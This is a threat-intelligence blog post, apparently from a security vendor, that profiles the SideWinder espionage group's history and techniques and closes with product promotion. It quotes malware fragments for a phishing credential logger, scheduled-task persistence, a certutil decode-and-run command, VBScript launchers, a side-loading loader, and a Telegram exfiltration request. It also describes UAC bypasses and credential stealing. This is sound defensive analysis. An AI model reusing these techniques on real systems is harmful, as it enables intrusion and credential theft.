SideWinder is a long-running cyber-espionage group active since at least 2012, consistently refining its targeting and operational scale. Over the years, the group has expanded from focused regional intrusions to wide-ranging campaigns across Asia, Africa, and parts of Europe. Major events include its public naming in 2018, COVID-19–themed operations in 2020, expansive multi-country campaigns between 2021 and 2024, and the continued broadening of its geographic and sectoral focus, particularly toward government, military, financial, maritime, logistics, and nuclear-related entities.
SideWinder’s TTPs center on highly tailored spearphishing for initial access, using malicious files, links, and credential-harvesting pages. Execution typically relies on Windows scripting environments such as cmd.exe, VBA, VBScript, and mshta-based HTA delivery. Persistence is maintained through scheduled tasks and autostart scripts, while privilege escalation leverages UAC bypass techniques. The group employs extensive defense evasion techniques, which include obfuscation, masquerading, artifact cleanup, and DLL side-loading, alongside robust credential-theft capabilities targeting RDP, Windows credential stores, and browser data. Its collection methods include harvesting documents, system information, and browser tokens, while C2 operations rely on rotating server lists, encrypted channels, and occasional web-service, based exfiltration.
In this post, we will review SideWinder’s major historical operations, highlight its expansive targeting across government, military, financial, and critical-infrastructure sectors, and examine the group’s tactics, techniques, and procedures to understand how it conducts methodical, multi-stage cyber-espionage campaigns. In the end, we will show how Picus helps defend against this group.
Simulate APT Attacks with 14-Day Free Trial of Picus Platform
2012 (at least) – The threat group begins activity, specializing in cyberespionage [1].
12 April 2018 – Kaspersky publicly names the SideWinder APT group for the first time in an APT Trends summary [2].
2020 – The group capitalizes on global events by launching campaigns utilizing a COVID-19 theme to lure victims, notably targeting Pakistani Government Officials [3].
June – November 2021 – SideWinder conducts a systematic and expansive campaign targeting over 60 entities across South and East Asia, including governments, military organizations, central banks, and media in Afghanistan, Bhutan, Myanmar, Nepal, and Sri Lanka [1].
2024 – The group broadens its geographic operations across numerous regions, including Africa, Austria, Bangladesh, Cambodia, Djibouti, Egypt, Indonesia, Mozambique, the Philippines, Sri Lanka, the UAE, Vietnam, and global diplomatic entities, while shifting its sector focus toward maritime infrastructure, logistics companies, and nuclear power facilities in South Asia [4].
The attack chain is dependent on the victim running a malicious file. In some attack chains, a ZIP archive is delivered containing a malicious LNK (shortcut) file. Upon execution, this LNK file runs code to fetch the next-stage HTA payload from an attacker-controlled server [2].
The group's principal infiltration vector is spearphishing emails carrying malicious attachments. While RTF (Rich Text Format) files are common, other formats like DOCX, LNK, and ZIP files are also employed.
One observed example targeted Pakistani government offices with a malicious .docx file, using a lure related to police procedures [2].
|
From: SSP INT LCTD SINDH |
Beyond attachments, the threat actor also utilizes spearphishing links to direct victims to malicious destinations. These links often lead to credential harvesting sites, which are sophisticated phishing pages impersonating legitimate login portals for services like the Zimbra web client, the Central Bank of Myanmar, and the Nucleus Vision crypto platform.
A backend login.php script is used to capture credentials. This script is configured to harvest the victim's username, password, IP address, access time, and User-Agent, inserting them into a MySQL database [1]. A significant attributional clue is the script's hardcoded timezone setting of Asia/kolkata, which is set before recording the access time.
|
<?php $accesstime = date('d-m-Y H:i:s"); $sql = "INSERT INTO vision.nucleus (username, password, ipaddress, accesstime, signature) VALUES ('$username', '$password', '$ip', '$accesstime', '$useragent')"; ?> |
The Windows Command Shell (cmd.exe) is a fundamental component for orchestrating the infection. Malicious macros and HTA files frequently drop and execute batch scripts (often named a.bat). These scripts manage various actions, including creating persistence via scheduled tasks, running payloads, and cleaning up forensic evidence [1].
|
schtasks /create /SC minute /MO 2 /TN WindowSecurityPatch /TR |
A more complex, multi-stage "dropper" script has also been observed. Its sole function is to use echo commands to write a series of other batch files (b.bat, c.bat, d.bat, e.bat) and VBScripts to the disk. This chain is responsible for downloading, decoding (using certutil), creating persistence (using schtasks), and finally deleting all operational artifacts [1].
|
echo off |
VBA macros (like the "Gohra" macro) embedded in Office documents are used to decode and drop payloads. The payload (e.g., a ZIP file) is stored as a long, delimited string within a form element (UserForm1.TextBox1.Text). The macro reconstructs the malicious file by splitting this string by its delimiter (e.g., "-") and converting each part into a byte [1].
|
Dim btsGohra7(361128) As Byte |
VBScript files, often executed by the batch scripts, serve as stealthy launchers and persistence mechanisms.
This script launches two other scripts, invisible2.vbs and a.bat, in hidden windows (argument 0) [1].
|
CreateObject("Wscript.Shell").Run "%APPDATA%\invisible2.vbs", 0, |
This script's function is to extract the contents of the WindowsSecurity.zip archive using the Shell Application COM object [1].
|
Set oApp = |
This script is used for persistence. It is placed in the Startup folder, sleeps for 5 minutes (300000 milliseconds), and then launches the main batch script (a.bat) in a hidden window [1].
|
WScript.Sleep 300000 |
A generic runner script that executes its first command-line argument (WScript.Arguments(0)) in a hidden window [1].
|
CreateObject("Wscript.Shell").Run Chr(34) & |
The malware employs direct Windows API calls to execute shellcode. For instance, one stager allocates a new memory buffer using VirtualAlloc, copies its shellcode into this buffer, and then passes execution to it by calling CreateThread [1].
The group is known to exploit CVE-2017-11882, a memory corruption vulnerability in the Microsoft Office Equation Editor. This flaw is used to gain code execution from malicious RTF files [2].
A core execution technique involves using mshta.exe, a legitimate and signed Microsoft utility. This binary is used to download and run remote HTA (HTML Application) files or JavaScript [1]. This action is typically initiated when a user clicks a malicious LNK file or via shellcode from an RTF exploit.
|
Link Target: C:\Windows\System32\mshta.exe |
The primary persistence mechanism on Windows is the use of Scheduled Tasks. Batch scripts run during infection leverage schtasks.exe to create new tasks. These tasks are configured to re-execute the main payload at frequent intervals, such as every 2 or 10 minutes, or daily at a set time [1].
|
# Runs every 2 minutes, named WindowSecurityPatch
|
In some infection chains, the inevitable.vbs script is dropped into the user's Startup folder [1]. This ensures the script is automatically run every time the user logs in.
The malware attempts to bypass User Account Control (UAC) using techniques selected based on the security products installed on the system. The default method abuses the CMSTP (Windows Connection Manager Profile Installer) program. This technique involves passing a custom profile to the legitimate CMSTP executable to run arbitrary commands with elevated privileges.
This default bypass is used unless Kaspersky or 360 Total Security products are detected. If those security solutions are present, the malware switches to a different UAC bypass that abuses the "IElevatedFactoryServer" COM object. In this scenario, shellcode is injected into explorer.exe. This shellcode loads a malicious library (from a resource named "COMUacBypass"), which uses the COM object to register a new, high-privilege Windows task. This task is then used to run the payload with elevated permissions [5].
To hinder static analysis, some payloads (like SideWinder.ReverseShell.e, and the Chisel tool) are packed using UPX [1].
Persistence-related scheduled tasks are given common, system-related names to appear legitimate, such as WindowSecurityPatch, CloudAPIManager, WindowsUpdate, and WindowHost.
Payloads are given names like WindowsSecurity.exe to mimic benign Windows components.
Malicious LNK files are disguised using double file extensions, such as .pdf.lnk or .doc.lnk, to trick users into believing they are simple documents.
The multi-stage batch scripts are designed for self-cleanup. For example, the final e.bat script in one chain is tasked with deleting all previous batch scripts (b.bat, c.bat, d.bat) and the downloaded encoded payload (cloudstatus.txt) after the final executable is active and persisted.
The group employs several methods to decode payloads on the victim's machine. The legitimate Windows utility certutil.exe is used to Base64-decode payloads downloaded to disk (e.g., hello.txt, cloudstatus.txt) [1].
|
cmd.exe /c certutil -decode %tmp%/hello.txt %tmp%/scvhost.exe & %tmp%/ scvhost.exe |
Various custom XOR decryption schemes are also used [1], [5].
Malicious files and directories are hidden. One HTA downloader creates the %userprofile%\windowshost directory with both "hidden" and "system" attributes. The batch scripts also use the attrib +h command to hide payloads and themselves from user view [1].
DLL side-loading is a key technique for both execution and evasion. An HTA script first copies a legitimate, signed executable (e.g., rekeywiz.exe) to a new directory. It then drops a malicious loader DLL into the same directory but renames it to match a legitimate DLL that the executable tries to load (e.g., Duser.dll).
A configuration file (rekeywiz.exe.config) is also dropped to prevent .NET versioning issues. When the legitimate rekeywiz.exe is run, the Windows loader finds and loads the malicious Duser.dll first. This loader DLL then reads, decrypts, and loads the final implant (e.g., MpyutHk.tmp) from disk into memory.
rekeywiz.exe.config file forces the legitimate executable to use .NET runtimes compatible with the malicious DLL.
|
<?xml version="1.0" encoding="utf-8"?> |
This code shows the loader reading the encrypted implant, using the first 32 bytes as a rolling XOR key, and loading the decrypted assembly [2].
|
static Program()
Program.BufferCopy_1(ref assemblyData, 32, ref array, array.Length);
for (int i = 0; i < array.Length; i++) {
|
The "StealerBot" implant includes an advanced RDP credential stealer. It monitors for the mstsc.exe (RDP client) process. When launched, shellcode is injected into the process. This shellcode loads a malicious C++ library that uses the Microsoft Detours package to hook three functions within SspiCli.dll:
Stolen credentials are sent back to the main implant via a named pipe: c63hh148d7c9437caa0f5850256ad32c [5].
Another StealerBot module targets Windows credentials. It injects shellcode into explorer.exe, loading credsphisher.dll. This DLL calls the CredUIPromptForWindowsCredentialsW API, which displays a legitimate-looking native Windows prompt. It validates the entered credentials using LogonUserW. If valid, they are exfiltrated via a named pipe (a21hg56ue2c2365cba1g9840256ad31c). If invalid, the prompt is shown again in a loop until correct credentials are provided [5].
A .NET "StealerBot Token Grabber" module is designed to steal cookies and authentication tokens from high-value services like Facebook, LinkedIn, and Google (Gmail, Google Drive). It achieves this by dropping its own legitimate dependencies (e.g., Newtonsoft.Json.dll, System.Data.SQLite.dll) to parse the browser's cookie database and exfiltrate the tokens [5].
A C# tool, originally named ChromeRecovery.exe, is used to extract authentication data from a wide variety of web browsers, including "Chrome", "Opera", "Yandex", "Brave Browser", "Vivaldi", and "Edge Chromium". The collected data (URL, username, password, and application) is saved to %TEMP%\windowslogs.txt [1].
A Python-based stealer (SideWinder.StealerPy) gathers the victim's local and external IP addresses. The external IP is identified by making a request to the public service http://ip.42.pl/raw [1].
One stealer variant searches the user's Desktop, Downloads, and Documents folders for files with specific extensions: .txt, .docx, .pdf, .xlsx, .pptx, .snt, .jpg, and .png. It also obtains a full list of all files and directories on the Desktop.
Malware is programmed to collect files from the local system. The SideWinder.StealerPy not only collects documents but also reads the first 200 characters of .txt files, likely for quick data triage [1].
The "StealerBot" implant gathers extensive system information using WMI queries and formats it into a JSON file for exfiltration. Collected data includes user accounts, computer system details (model, manufacturer, RAM), installed antivirus products, running processes, and detailed network interface information [2].
|
jsonWriter.WritePropertyName("sysInfo"); SysInfo.WriteWmi(jsonWriter, "Win32_process", "root\cimv2", new string { "Name", "CommandLine", "ProcessOwner" }); //... code loops through NetworkInterface.GetAllNetworkInterfaces() // to collect MAC, IP, Type, Speed, IsDhcpEnabled, etc. |
One of the RATs contains a hardcoded list of C2 server addresses. It randomly selects a server from this list upon execution. If the connection fails, it iterates to the next server, providing resilience against C2 takedowns [1].
|
C2 Server List |
One RAT variant uses the Telegram Bot API for exfiltration, sending a GET request with Base64-encoded data [1].
|
GET REQUEST TO https://api[.]telegram[.]org/bot[token]/sendMessage?chat_id=[id]&text=[base64_data] |
The Chisel tool, a Go-based utility for network traffic tunneling, has been utilized. The PE32 executable, packed with UPX, was observed connecting to a hardcoded server (microsoft-winupdate[.]servehttp[.]com:8443) and listening on local port 45689 for inbound connections [1].
C2 communications are not sent in clear text. One RAT uses a custom, multi-layer obfuscation scheme designed to evade network signatures. The data is first Base64 encoded, then XOR-encrypted with the 3-byte key "NPA", and finally Base64 encoded two more times [1].
We also strongly suggest simulating SideWinder Attacks to test the effectiveness of your security controls against real-life cyber attacks using the Picus Security Validation Platform. You can also test your defenses against hundreds of other threat groups within minutes with a 14-day free trial of the Picus Platform.
Picus Threat Library includes the following threats for SideWinder:
|
Threat ID |
Threat Name |
Attack Module |
|
90234 |
Sidewinder Threat Group Campaign Malware Downloader Email Threat |
Network Infiltration |
|
50150 |
Sidewinder Threat Group Campaign Malware Downloader Download Threat |
Network Infiltration |
|
29210 |
Sidewinder Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
20419 |
Sidewinder Threat Group Campaign Malware Email Threat |
Network Infiltration |
|
73639 |
Sidewinder Threat Group Campaign Malware Email Threat |
Network Infiltration |
|
45965 |
Sidewinder Threat Group Campaign Malware Download Threat |
Network Infiltration |
|
75691 |
SideWinder Threat Group Campaign |
Windows Endpoint |
Start simulating emerging threats today and get actionable mitigation insights with a 14-day free trial of the Picus Security Validation Platform.
SideWinder is also known as: T-APT-04, Rattlesnake, Razor Tiger, APT-C-17, Hardcore Nationalist, HN2, APT-Q-39, BabyElephant, GroupA21.
References
[1] “OLD SNAKE, NEW SKIN.” Accessed: Nov. 16, 2025. [Online]. Available: https://go.group-ib.com/report-sidewinder-2023
[2] “A global perspective of the SideWinder APT.” Accessed: Nov. 16, 2025. [Online]. Available: https://cdn-cybersecurity.att.com/docs/global-perspective-of-the-sidewinder-apt.pdf
[3] “Sidewinder APT Group Campaign Analysis,” Rewterz - Revolutionizing Cybersecurity. Accessed: Nov. 16, 2025. [Online]. Available: https://rewterz.com/threats/sidewinder-apt-group-campaign-analysis
[4] G. Dedola, “SideWinder targets the maritime and nuclear sectors with an updated toolset,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt-updates-its-toolset-and-targets-nuclear-sector/115847/
[5] G. Dedola, “Beyond the Surface: the evolution and expansion of the SideWinder APT group,” Kaspersky. Accessed: Nov. 16, 2025. [Online]. Available: https://securelist.com/sidewinder-apt/114089/